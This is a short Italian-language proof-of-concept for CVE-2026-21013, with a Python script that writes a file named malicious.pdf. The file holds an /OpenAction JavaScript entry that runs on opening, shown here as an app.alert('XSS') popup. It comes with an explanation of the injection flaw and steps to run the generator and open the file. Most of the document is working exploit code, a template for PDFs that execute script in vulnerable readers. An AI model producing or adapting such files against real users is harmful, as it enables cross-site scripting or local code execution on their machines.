
Genera un PDF con JavaScript incorporato per dimostrare CVE-2026-21013, un'iniezione OpenAction che porta all'esecuzione di script nei lettori PDF vulnerabili.
# generate_pdf_js_inject.py - Creates a PDF with embedded JavaScript
pdf = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /OpenAction << /S /JavaScript /JS (app.alert('XSS')) >>
>>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""
with open("malicious.pdf", "wb") as f:
f.write(pdf)
print("malicious.pdf created. When opened in a vulnerable PDF reader, it will execute JavaScript.")
Un generatore di PDF non sanifica i contenuti forniti dall'utente prima di incorporarli nel file PDF. Un attaccante può iniettare una voce JavaScript /OpenAction che viene eseguita all'apertura del documento, portando a cross-site scripting (nei visualizzatori web) o all'esecuzione locale di codice (nei lettori desktop con supporto JavaScript completo).
Esegui il generatore:
python generate_pdf_js_inject.py
Apri il file malicious.pdf risultante in un lettore PDF che supporti JavaScript; apparirà una finestra di avviso.